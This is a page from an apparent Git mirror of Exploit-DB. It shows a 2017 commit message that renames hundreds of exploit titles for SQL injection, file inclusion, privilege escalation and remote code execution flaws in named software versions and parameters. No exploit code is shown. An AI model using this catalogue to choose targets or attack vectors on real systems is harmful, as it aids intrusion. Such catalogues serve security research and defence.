bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/java/remote/42756.py
Offensive Security 13a6e2baaf DB: 2017-09-20 
8 new exploits

McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC)
McAfee E-Business Server 8.5.2 - Unauthenticated Remote Code Execution / Denial of Service (PoC)

Apple macOS - Local Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization
Apple macOS - Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization
Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading
Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read

Xcode OpenBase 9.1.5 (OSX) - (root file create) Privilege Escalation
Xcode OpenBase 9.1.5 (OSX) - (Root File Create) Privilege Escalation

Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation
Xcode OpenBase 10.0.0 (OSX) - (Unsafe System Call) Privilege Escalation

eTrust AntiVirus Agent r8 - Local Privilege Escalation
eTrust AntiVirus Agent r8 - Privilege Escalation

WICD 1.7.1 - Local Privilege Escalation
WICD 1.7.1 - Privilege Escalation

Novell Client 4.91 SP4 - Local Privilege Escalation
Novell Client 4.91 SP4 - Privilege Escalation

H-Sphere Webshell 2.4 - Privilege Escalation
H-Sphere WebShell 2.4 - Privilege Escalation

Zend Platform 2.2.1 - PHP.INI File Modification
Zend Platform 2.2.1 - 'PHP.INI' File Modification

AIX 7.1 - lquerylv Privilege Escalation
AIX 7.1 - 'lquerylv' Privilege Escalation

sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation
Sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation

Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation
Serviio PRO 1.8 DLNA Media Streaming Server - Privilege Escalation

Automated Logic WebCTRL 6.5 - Local Privilege Escalation
Automated Logic WebCTRL 6.5 - Privilege Escalation

Netdecision 5.8.2 - Local Privilege Escalation
Netdecision 5.8.2 - Privilege Escalation

H-Sphere Webshell 2.4 - Remote Command Execution
H-Sphere WebShell 2.4 - Remote Command Execution

NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Remote Perl Code Execution (Metasploit)
NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Perl Remote Code Execution (Metasploit)

STUNSHELL Web Shell - Remote PHP Code Execution (Metasploit)
STUNSHELL Web Shell - PHP Remote Code Execution (Metasploit)

v0pCr3w Web Shell - Remote Code Execution (Metasploit)
v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)

InstantCMS 1.6 - Remote PHP Code Execution (Metasploit)
InstantCMS 1.6 - PHP Remote Code Execution (Metasploit)

Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)

HPE < 7.2 - Java Deserialization

Tecnovision DLX Spot - SSH Backdoor

phpBB 2.0.15 - (highlight) Remote PHP Code Execution
phpBB 2.0.15 - 'highlight' PHP Remote Code Execution

phpBB 2.0.15 - Remote PHP Code Execution (Metasploit)
phpBB 2.0.15 - PHP Remote Code Execution (Metasploit)

versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection
versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection

VuBB Forum RC1 - (m) SQL Injection
VuBB Forum RC1 - 'm' SQL Injection
Wizz Forum 1.20 - (TopicID) SQL Injection
PHPWebThings 1.4 - (msg/forum) SQL Injection
Wizz Forum 1.20 - 'TopicID' SQL Injection
PHPWebThings 1.4 - 'msg'/'forum' SQL Injection

webSPELL 4.01 - (title_op) SQL Injection
webSPELL 4.01 - 'title_op' SQL Injection

YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution
YapBB 1.2 - 'cfgIncludeDirectory' Remote Command Execution
TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (1)
Advanced Guestbook 2.4.0 - (phpBB) File Inclusion
TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (2)
Advanced Guestbook 2.4.0 - (phpBB) Remote File Inclusion
TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)
Advanced Guestbook 2.4.0 - 'phpBB' File Inclusion
TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (2)
Advanced Guestbook 2.4.0 - 'phpBB' Remote File Inclusion

Knowledge Base Mod 2.0.2 - (phpBB) Remote File Inclusion
Knowledge Base Mod 2.0.2 - 'phpBB' Remote File Inclusion
phpRaid 3.0.b3 - (phpBB/SMF) Remote File Inclusion
pafileDB 2.0.1 - (mxBB/phpBB) Remote File Inclusion
phpRaid 3.0.b3 - 'phpBB'/'SMF' Remote File Inclusion
pafileDB 2.0.1 - 'mxBB'/'phpBB' Remote File Inclusion

Foing 0.7.0 - (phpBB) Remote File Inclusion
Foing 0.7.0 - 'phpBB' Remote File Inclusion

Activity MOD Plus 1.1.0 - (phpBB Mod) File Inclusion
Activity MOD Plus 1.1.0 - 'phpBB Mod' File Inclusion

Blend Portal 1.2.0 - (phpBB Mod) Remote File Inclusion
Blend Portal 1.2.0 - 'phpBB Mod' Remote File Inclusion

XMB 1.9.6 - (u2uid) SQL Injection (mq=off)
XMB 1.9.6 - (mq=off) 'u2uid' SQL Injection

Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote File Inclusion
Web3news 0.95 - 'PHPSECURITYADMIN_PATH' Remote File Inclusion

Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion
Yappa-ng 2.3.1 - 'admin_modules' Remote File Inclusion

TualBLOG 1.0 - (icerikno) SQL Injection
TualBLOG 1.0 - 'icerikno' SQL Injection

Tekman Portal 1.0 - (tr) SQL Injection
Tekman Portal 1.0 - 'tr' SQL Injection

MyReview 1.9.4 - (email) SQL Injection / Code Execution
MyReview 1.9.4 - 'email' SQL Injection / Code Execution

phpQuestionnaire 3.12 - (phpQRootDir) Remote File Inclusion
phpQuestionnaire 3.12 - 'phpQRootDir' Remote File Inclusion

phpBB Static Topics 1.0 - phpbb_root_path File Inclusion
phpBB Static Topics 1.0 - 'phpbb_root_path' File Inclusion

CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion
CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion

webSPELL 4.01.01 - (getsquad) SQL Injection
webSPELL 4.01.01 - 'getsquad' SQL Injection

Osprey 1.0 - GetRecord.php Remote File Inclusion
Osprey 1.0 - 'GetRecord.php' Remote File Inclusion
Techno Dreams Announcement - (key) SQL Injection
Techno Dreams Guestbook 1.0 - (key) SQL Injection
Techno Dreams Announcement - 'key' SQL Injection
Techno Dreams Guestbook 1.0 - 'key' SQL Injection

GEPI 1.4.0 - gestion/savebackup.php Remote File Inclusion
GEPI 1.4.0 - 'gestion/savebackup.php' Remote File Inclusion

PHPGiggle 12.08 - (CFG_PHPGIGGLE_ROOT) File Inclusion
PHPGiggle 12.08 - 'CFG_PHPGIGGLE_ROOT' File Inclusion

mxBB Module Meeting 1.1.2 - Remote FileInclusion
mxBB Module Meeting 1.1.2 - Remote File Inclusion

Uploader & Downloader 3.0 - (id_user) SQL Injection
Uploader & Downloader 3.0 - 'id_user' SQL Injection

The Classified Ad System 1.0 - (main) SQL Injection
The Classified Ad System 1.0 - 'main' SQL Injection

VisoHotlink 1.01 - functions.visohotlink.php Remote File Inclusion
VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion

vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion
vhostadmin 0.1 - 'MODULES_DIR' Remote File Inclusion

XLAtunes 0.1 - (album) SQL Injection
XLAtunes 0.1 - 'album' SQL Injection

webSPELL 4.01.02 - (topic) SQL Injection
webSPELL 4.01.02 - 'topic' SQL Injection

webSPELL 4.01.02 - Remote PHP Code Execution
webSPELL 4.01.02 - PHP Remote Code Execution

PHP-Nuke - iFrame (iframe.php) Remote File Inclusion
PHP-Nuke - 'iframe.php' Remote File Inclusion

XOOPS Module Camportail 1.1 - (camid) SQL Injection
XOOPS Module Camportail 1.1 - 'camid' SQL Injection

Mutant 0.9.2 - mutant_functions.php Remote File Inclusion
Mutant 0.9.2 - 'mutant_functions.php' Remote File Inclusion

Original 0.11 - config.inc.php x[1] Remote File Inclusion
Original 0.11 - 'config.inc.php' 'x[1]' Remote File Inclusion

Glossword 1.8.1 - custom_vars.php Remote File Inclusion
Glossword 1.8.1 - 'custom_vars.php' Remote File Inclusion

GeekLog 2.x - ImageImageMagick.php Remote File Inclusion
GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion

Vizayn Urun Tanitim Sistemi 0.2 - (tr) SQL Injection
Vizayn Urun Tanitim Sistemi 0.2 - 'tr' SQL Injection

WBB2-Addon: Acrotxt 1.0 - (show) SQL Injection
WBB2-Addon: Acrotxt 1.0 - 'show' SQL Injection

STPHPLibrary - (STPHPLIB_DIR) Remote File Inclusion
STPHPLibrary - 'STPHPLIB_DIR' Remote File Inclusion

phpFFL 1.24 - PHPFFL_FILE_ROOT Remote File Inclusion
phpFFL 1.24 - 'PHPFFL_FILE_ROOT' Remote File Inclusion

phpBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion
phpBB Mod OpenID 0.2.0 - 'BBStore.php' Remote File Inclusion

LiveAlbum 0.9.0 - common.php Remote File Inclusion
LiveAlbum 0.9.0 - 'common.php' Remote File Inclusion

Pindorama 0.1 - client.php Remote File Inclusion
Pindorama 0.1 - 'client.php' Remote File Inclusion
Socketmail 2.2.8 - fnc-readmail3.php Remote File Inclusion
TOWeLS 0.1 - scripture.php Remote File Inclusion
Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
TOWeLS 0.1 - 'scripture.php' Remote File Inclusion

Sige 0.1 - sige_init.php Remote File Inclusion
Sige 0.1 - 'sige_init.php' Remote File Inclusion

Scribe 0.2 - Remote PHP Code Execution
Scribe 0.2 - PHP Remote Code Execution

patBBcode 1.0 - bbcodeSource.php Remote File Inclusion
patBBcode 1.0 - 'bbcodeSource.php' Remote File Inclusion

Tilde CMS 4.x - (aarstal) SQL Injection
Tilde CMS 4.x - 'aarstal' SQL Injection

CityWriter 0.9.7 - head.php Remote File Inclusion
CityWriter 0.9.7 - 'head.php' Remote File Inclusion

PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion
PhpMyDesktop/Arcade 1.0 Final - 'phpdns_basedir' Remote File Inclusion

WebSihirbazi 5.1.1 - (pageid) SQL Injection
WebSihirbazi 5.1.1 - 'pageid' SQL Injection

Blakord Portal Beta 1.3.A - (all modules) SQL Injection
Blakord Portal Beta 1.3.A - (All Modules) SQL Injection

PHP Links 1.3 - smarty.php Remote File Inclusion
PHP Links 1.3 - 'smarty.php' Remote File Inclusion

Aterr 0.9.1 - Local File Inclusion (PHP5)
Aterr 0.9.1 - PHP5 Local File Inclusion

phpEmployment - (PHP upload) Arbitrary File Upload
phpEmployment - 'PHP Upload' Arbitrary File Upload

XOOPS 2.3.2 - 'mydirname' Remote PHP Code Execution
XOOPS 2.3.2 - 'mydirname' PHP Remote Code Execution

Xplode CMS - (wrap_script) SQL Injection
Xplode CMS - 'wrap_script' SQL Injection

VS PANEL 7.3.6 - (Cat_ID) SQL Injection
VS PANEL 7.3.6 - 'Cat_ID' SQL Injection

WebMember 1.0 - (formID) SQL Injection
WebMember 1.0 - 'formID' SQL Injection

Dokuwiki 2009-02-14 - Remote/Temporary File Inclusion
Dokuwiki 2009-02-14 - Temporary/Remote File Inclusion

Kjtechforce mailman b1 - (code) SQL Injection Delete Row
Kjtechforce mailman b1 - (Delete Row) 'code' SQL Injection

Virtue Classifieds - (category) SQL Injection
Virtue Classifieds - 'category' SQL Injection

XOOPS Celepar Module Qas - (codigo) SQL Injection
XOOPS Celepar Module Qas - 'codigo' SQL Injection

URA 3.0 - (cat) SQL Injection
URA 3.0 - 'cat' SQL Injection

TYPO3 CMS 4.0 - (showUid) SQL Injection
TYPO3 CMS 4.0 - 'showUid' SQL Injection

Typing Pal 1.0 - (idTableProduit) SQL Injection
Typing Pal 1.0 - 'idTableProduit' SQL Injection

Videos Broadcast Yourself 2 - (UploadID) SQL Injection
Videos Broadcast Yourself 2 - 'UploadID' SQL Injection

Uiga Church Portal - (year) SQL Injection
Uiga Church Portal - 'year' SQL Injection

Network Management/Inventory System - header.php Remote File Inclusion
Network Management/Inventory System - 'header.php' Remote File Inclusion

BASE 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)
BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit)

PHP-Nuke 8.0 - ' News Module Cross-Site Scripting / HTML Code Injection
PHP-Nuke 8.0 - (News Module) Cross-Site Scripting / HTML Code Injection

Vivid Ads Shopping Cart - (prodid) SQL Injection
Vivid Ads Shopping Cart - 'prodid' SQL Injection

WorldPay Script Shop - (productdetail) SQL Injection
WorldPay Script Shop - 'productdetail' SQL Injection

tincan ltd - (section) SQL Injection
tincan ltd - 'section' SQL Injection

Template Seller Pro 3.25 - (tempid) SQL Injection
Template Seller Pro 3.25 - 'tempid' SQL Injection

Webloader 7 < 8 - (vid) SQL Injection
Webloader 7 < 8 - 'vid' SQL Injection

web5000 - (page_show) SQL Injection
web5000 - 'page_show' SQL Injection

Cosmos Solutions CMS - (id= / page=) SQL Injection
Cosmos Solutions CMS - 'id=' / 'page=' SQL Injection

iBoutique - (page) SQL Injection / Cross-Site Scripting
iBoutique - 'page' SQL Injection / Cross-Site Scripting

OpenX - (phpAdsNew) Remote File Inclusion
OpenX - 'phpAdsNew' Remote File Inclusion

System Shop - (Module aktka) SQL Injection
System Shop - 'Module aktka' SQL Injection

TikiWiki tiki-graph_formula - Remote PHP Code Execution (Metasploit)
TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit)

vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection
vBulletin 4.0.x 4.1.3 - 'messagegroupid' SQL Injection

PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (1)
PmWiki 2.2.34 - 'pagelist' Remote PHP Code Injection (1)

YABB SE 0.8/1.4/1.5 - Packages.php Remote File Inclusion
YABB SE 0.8/1.4/1.5 - 'Packages.php' Remote File Inclusion

Invision Board 1.1.1 - ipchat.php Remote File Inclusion
Invision Board 1.1.1 - 'ipchat.php' Remote File Inclusion

Typo3 3.5 b5 - Translations.php Remote File Inclusion
Typo3 3.5 b5 - 'Translations.php' Remote File Inclusion

Webchat 0.77 - Defines.php Remote File Inclusion
Webchat 0.77 - 'Defines.php' Remote File Inclusion

PHP-Nuke 6.5 - Multiple Downloads Module SQL Injection
PHP-Nuke 6.5 - (Multiple Downloads Module) SQL Injection

ttCMS 2.2/2.3 - header.php Remote File Inclusion
ttCMS 2.2/2.3 - 'header.php' Remote File Inclusion

PMachine 2.2.1 - Lib.Inc.php Remote File Inclusion Command Execution
PMachine 2.2.1 - 'Lib.Inc.php' Remote File Inclusion / Command Execution

HolaCMS 1.2.x - HTMLtags.php Local File Inclusion
HolaCMS 1.2.x - 'HTMLtags.php' Local File Inclusion

WebCalendar 0.9.x - Multiple Module SQL Injection
WebCalendar 0.9.x - (Multiple Modules) SQL Injection

PHP-Nuke 6.x - Multiple Module SQL Injection
PHP-Nuke 6.x - (Multiple Modules) SQL Injection

EasyDynamicPages 1.0 - 'config_page.php' Remote PHP File Inclusion
EasyDynamicPages 1.0 - 'config_page.php' PHP Remote File Inclusion

VisualShapers EZContents 1.4/2.0 - module.php Remote Command Execution
VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution

Mambo Open Source 4.5/4.6 - mod_mainmenu.php Remote File Inclusion
Mambo Open Source 4.5/4.6 - 'mod_mainmenu.php' Remote File Inclusion

PHPGedView 2.x - [GED_File]_conf.php Remote File Inclusion
PHPGedView 2.x - '[GED_File]_conf.php' Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script fonctions.lib.php Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script derniers_commentaires.php Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script admin.php Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script 'fonctions.lib.php' Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script 'derniers_commentaires.php' Remote File Inclusion
Laurent Adda Les Commentaires 2.0 - PHP Script 'admin.php' Remote File Inclusion
VisualShapers EZContents 1.x/2.0 - db.php Arbitrary File Inclusion
VisualShapers EZContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion
VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion
VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion

VirtuaSystems VirtuaNews 1.0.x - Multiple Module Cross-Site Scripting Vulnerabilities
VirtuaSystems VirtuaNews 1.0.x - (Multiple Modules) Cross-Site Scripting Vulnerabilities

WarpSpeed 4nAlbum Module 0.92 - displaycategory.php basepath Parameter Remote File Inclusion
WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php' 'basepath' Parameter Remote File Inclusion

Gemitel 3.50 - affich.php Remote File Inclusion Command Injection
Gemitel 3.50 - 'affich.php' Remote File Inclusion / Command Injection

phpBB 2.0.x - album_portal.php Remote File Inclusion
phpBB 2.0.x - 'album_portal.php' Remote File Inclusion

Mail Manage EX 3.1.8 MMEX - Script Settings Parameter Remote PHP File Inclusion
Mail Manage EX 3.1.8 MMEX - Script Settings Parameter PHP Remote File Inclusion

Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - Common.php Remote File Inclusion
Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - 'Common.php' Remote File Inclusion

@lexPHPTeam @lex Guestbook 3.12 - Remote PHP File Inclusion
@lexPHPTeam @lex Guestbook 3.12 - PHP Remote File Inclusion

phpBB 2.0.x - 'admin_cash.php' Remote PHP File Inclusion
phpBB 2.0.x - 'admin_cash.php' PHP Remote File Inclusion

Stadtaus.Com Download Center Lite 1.5 - Remote PHP File Inclusion
Stadtaus.Com Download Center Lite 1.5 - PHP Remote File Inclusion

Work System eCommerce 3.0.3/3.0.4 - forum.php Remote File Inclusion
Work System eCommerce 3.0.3/3.0.4 - 'forum.php' Remote File Inclusion

phpGroupWare 0.9.14 - Tables_Update.Inc.php Remote File Inclusion
phpGroupWare 0.9.14 - 'Tables_Update.Inc.php' Remote File Inclusion

PANews 2.0 - Remote PHP Script Code Execution
PANews 2.0 - PHP Remote Code Execution

VoteBox 2.0 - Votebox.php Remote File Inclusion
VoteBox 2.0 - 'Votebox.php' Remote File Inclusion

McNews 1.x - install.php Arbitrary File Inclusion
McNews 1.x - 'install.php' Arbitrary File Inclusion

Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion
Vortex Portal 2.0 - 'content.php' act Parameter Remote File Inclusion

phpBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection
phpBB 1.x/2.0.x - (Knowledge Base Module) 'KB.php' SQL Injection

GrayCMS 1.1 - error.php Remote File Inclusion
GrayCMS 1.1 - 'error.php' Remote File Inclusion

PHP Poll Creator 1.0.1 - Poll_Vote.php Remote File Inclusion
PHP Poll Creator 1.0.1 - 'Poll_Vote.php' Remote File Inclusion

MWChat 6.7 - Start_Lobby.php Remote File Inclusion
MWChat 6.7 - 'Start_Lobby.php' Remote File Inclusion

Popper Webmail 1.41 - ChildWindow.Inc.php Remote File Inclusion
Popper Webmail 1.41 - 'ChildWindow.Inc.php' Remote File Inclusion

RaXnet Cacti 0.5/0.6/0.8 - Config_Settings.php Remote File Inclusion
RaXnet Cacti 0.5/0.6/0.8 - 'Config_Settings.php' Remote File Inclusion

RaXnet Cacti 0.5/0.6/0.8 - Top_Graph_Header.php Remote File Inclusion
RaXnet Cacti 0.5/0.6/0.8 - 'Top_Graph_Header.php' Remote File Inclusion

MyGuestbook 0.6.1 - Form.Inc.php3 Remote File Inclusion
MyGuestbook 0.6.1 - 'Form.Inc.php3' Remote File Inclusion

Comdev eCommerce 3.0 - config.php Remote File Inclusion
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion

PHPWebNotes 2.0 - Api.php Remote File Inclusion
PHPWebNotes 2.0 - 'Api.php' Remote File Inclusion

Autolinks 2.1 Pro - Al_initialize.php Remote File Inclusion
Autolinks 2.1 Pro - 'Al_initialize.php' Remote File Inclusion
MySource 2.14 - Socket.php PEAR_PATH Remote File Inclusion
MySource 2.14 - Request.php PEAR_PATH Remote File Inclusion
MySource 2.14 - 'Socket.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Request.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - mail.php PEAR_PATH Remote File Inclusion
MySource 2.14 - Date.php PEAR_PATH Remote File Inclusion
MySource 2.14 - Span.php PEAR_PATH Remote File Inclusion
MySource 2.14 - mimeDecode.php PEAR_PATH Remote File Inclusion
MySource 2.14 - mime.php PEAR_PATH Remote File Inclusion
MySource 2.14 - 'mail.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Date.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Span.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mimeDecode.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mime.php' 'PEAR_PATH' Remote File Inclusion

Help Center Live 1.0/1.2/2.0 - module.php Local File Inclusion
Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion

Tru-Zone Nuke ET 3.x - Search Module SQL Injection
Tru-Zone Nuke ET 3.x - (Search Module) SQL Injection

vtiger CRM 4.2 - RSS Aggregation Module Feed Cross-Site Scripting
vtiger CRM 4.2 - (RSS Aggregation Module Feed) Cross-Site Scripting

CF_Nuke 4.6 - index.cfm Local File Inclusion
CF_Nuke 4.6 - 'index.cfm' Local File Inclusion

Tolva 0.1 - Usermods.php Remote File Inclusion
Tolva 0.1 - 'Usermods.php' Remote File Inclusion

SPiD 1.3.1 - Scan_Lang_Insert.php Local File Inclusion
SPiD 1.3.1 - 'Scan_Lang_Insert.php' Local File Inclusion

PHORUM 3.x/5.x - Common.php Remote File Inclusion
PHORUM 3.x/5.x - 'Common.php' Remote File Inclusion

SPIP 1.8.3 - Spip_login.php Remote File Inclusion
SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion

CyBoards PHP Lite 1.21/1.25 - Common.php Remote File Inclusion
CyBoards PHP Lite 1.21/1.25 - 'Common.php' Remote File Inclusion

Monster Top List 1.4 - functions.php Remote File Inclusion
Monster Top List 1.4 - 'functions.php' Remote File Inclusion

I-RATER Platinum - Common.php Remote File Inclusion
I-RATER Platinum - 'Common.php' Remote File Inclusion

I-RATER Platinum - Config_settings.TPL.php Remote File Inclusion
I-RATER Platinum - 'Config_settings.TPL.php' Remote File Inclusion

Advanced Guestbook 2.x - Addentry.php Remote File Inclusion
Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion
DMCounter 0.9.2 -b - Kopf.php Remote File Inclusion
phpBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion
DMCounter 0.9.2 -b - 'Kopf.php' Remote File Inclusion
phpBB Knowledge Base 2.0.2 - 'Mod KB_constants.php' Remote File Inclusion

ISPConfig 2.2.2/2.2.3 - Session.INC.php Remote File Inclusion
ISPConfig 2.2.2/2.2.3 - 'Session.INC.php' Remote File Inclusion

RadScripts RadLance 7.0 - popup.php Local File Inclusion
RadScripts RadLance 7.0 - 'popup.php' Local File Inclusion

osTicket 1.x - Open_form.php Remote File Inclusion
osTicket 1.x - 'Open_form.php' Remote File Inclusion

Squirrelmail 1.4.x - Redirect.php Local File Inclusion
Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion

phpBB 2.0.x - template.php Remote File Inclusion
phpBB 2.0.x - 'template.php' Remote File Inclusion

phpBB - BBRSS.php Remote File Inclusion
phpBB - 'BBRSS.php' Remote File Inclusion

eNpaper1 - Root_Header.php Remote File Inclusion
eNpaper1 - 'Root_Header.php' Remote File Inclusion

CrisoftRicette 1.0 - Cookbook.php Remote File Inclusion
CrisoftRicette 1.0 - 'Cookbook.php' Remote File Inclusion

MF Piadas 1.0 - admin.php Remote File Inclusion
MF Piadas 1.0 - 'admin.php' Remote File Inclusion

SiteBuilder-FX - top.php Remote File Inclusion
SiteBuilder-FX - 'top.php' Remote File Inclusion

Blog:CMS 4.1 - Thumb.php Remote File Inclusion
Blog:CMS 4.1 - 'Thumb.php' Remote File Inclusion

Extcalendar 2.0 - Extcalendar.php Remote File Inclusion
Extcalendar 2.0 - 'Extcalendar.php' Remote File Inclusion

RW::Download - stats.php Remote File Inclusion
RW::Download - 'stats.php' Remote File Inclusion

PHP Event Calendar 1.4 - calendar.php Remote File Inclusion
PHP Event Calendar 1.4 - 'calendar.php' Remote File Inclusion

Forum 5 - pm.php Local File Inclusion
Forum 5 - 'pm.php' Local File Inclusion

Advanced Poll 2.0.2 - common.inc.php Remote File Inclusion
Advanced Poll 2.0.2 - 'common.inc.php' Remote File Inclusion

Prince Clan Chess Club 0.8 - Include.PCchess.php Remote File Inclusion
Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion

Bosdates 3.x/4.0 - Payment.php Remote File Inclusion
Bosdates 3.x/4.0 - 'Payment.php' Remote File Inclusion

Moskool 1.5 Component - Admin.Moskool.php Remote File Inclusion
Moskool 1.5 Component - 'Admin.Moskool.php' Remote File Inclusion

WoW Roster 1.5 - hsList.php subdir Parameter Remote File Inclusion
WoW Roster 1.5 - 'hsList.php' 'subdir' Parameter Remote File Inclusion
VWar 1.5 - war.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - member.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - calendar.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - challenge.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - joinus.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - news.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - stats.php vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'war.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'member.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'calendar.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'challenge.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'joinus.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'news.php' vwar_root Parameter Remote File Inclusion
VWar 1.5 - 'stats.php' vwar_root Parameter Remote File Inclusion

Mafia Moblog 6 - Big.php Remote File Inclusion
Mafia Moblog 6 - 'Big.php' Remote File Inclusion

WEBinsta Mailing List Manager 1.3 - Install3.php Remote File Inclusion
WEBinsta Mailing List Manager 1.3 - 'Install3.php' Remote File Inclusion

Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion
Zen Cart Web Shopping Cart 1.x - 'autoload_func.php' 'autoLoadConfig[999][0][loadFile]' Parameter Remote File Inclusion

Jetbox CMS 2.1 - Search_function.php Remote File Inclusion
Jetbox CMS 2.1 - 'Search_function.php' Remote File Inclusion

In-portal In-Link 2.3.4 - ADODB_DIR.php Remote File Inclusion
In-portal In-Link 2.3.4 - 'ADODB_DIR.php' Remote File Inclusion

PHP-Proxima 6.0 - BB_Smilies.php Local File Inclusion
PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion
WM-News 0.5 - print.php Local File Inclusion
Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion
WM-News 0.5 - 'print.php' Local File Inclusion
Ractive Popper 1.41 - 'Childwindow.Inc.php' Remote File Inclusion

Exporia 0.3 - Common.php Remote File Inclusion
Exporia 0.3 - 'Common.php' Remote File Inclusion

My-BIC 0.6.5 - Mybic_Server.php Remote File Inclusion
My-BIC 0.6.5 - 'Mybic_Server.php' Remote File Inclusion

Geotarget - script.php Remote File Inclusion
Geotarget - 'script.php' Remote File Inclusion

PHPSelect Web Development - index.php3 Remote File Inclusion
PHPSelect Web Development - 'index.php3' Remote File Inclusion

PHP Web Scripts Easy Banner - functions.php Remote File Inclusion
PHP Web Scripts Easy Banner - 'functions.php' Remote File Inclusion

PHP Polling Creator 1.03 - functions.inc.php Remote File Inclusion
PHP Polling Creator 1.03 - 'functions.inc.php' Remote File Inclusion
Softerra PHP Developer Library 1.5.3 - Grid3.lib.php Remote File Inclusion
BlueShoes Framework 4.6 - GoogleSearch.php Remote File Inclusion
Tagit2b - DelTagUser.php Remote File Inclusion
Softerra PHP Developer Library 1.5.3 - 'Grid3.lib.php' Remote File Inclusion
BlueShoes Framework 4.6 - 'GoogleSearch.php' Remote File Inclusion
Tagit2b - 'DelTagUser.php' Remote File Inclusion

CommunityPortals 1.0 - bug.php Remote File Inclusion
CommunityPortals 1.0 - 'bug.php' Remote File Inclusion

PHP TopSites FREE 1.022b - config.php Remote File Inclusion
PHP TopSites FREE 1.022b - 'config.php' Remote File Inclusion

Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion
Buzlas 2006-1 Full - 'Archive_Topic.php' Remote File Inclusion

phpBB Add Name Module - Not_Mem.php Remote File Inclusion
phpBB Add Name Module - 'Not_Mem.php' Remote File Inclusion
RamaCMS - ADODB.Inc.php Remote File Inclusion
H-Sphere Webshell 2.x - 'login.php' Cross-Site Scripting
Mambo Module MOStlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion
Lodel CMS 0.7.3 - Calcul-page.php Remote File Inclusion
RamaCMS - 'ADODB.Inc.php' Remote File Inclusion
H-Sphere WebShell 2.x - 'login.php' Cross-Site Scripting
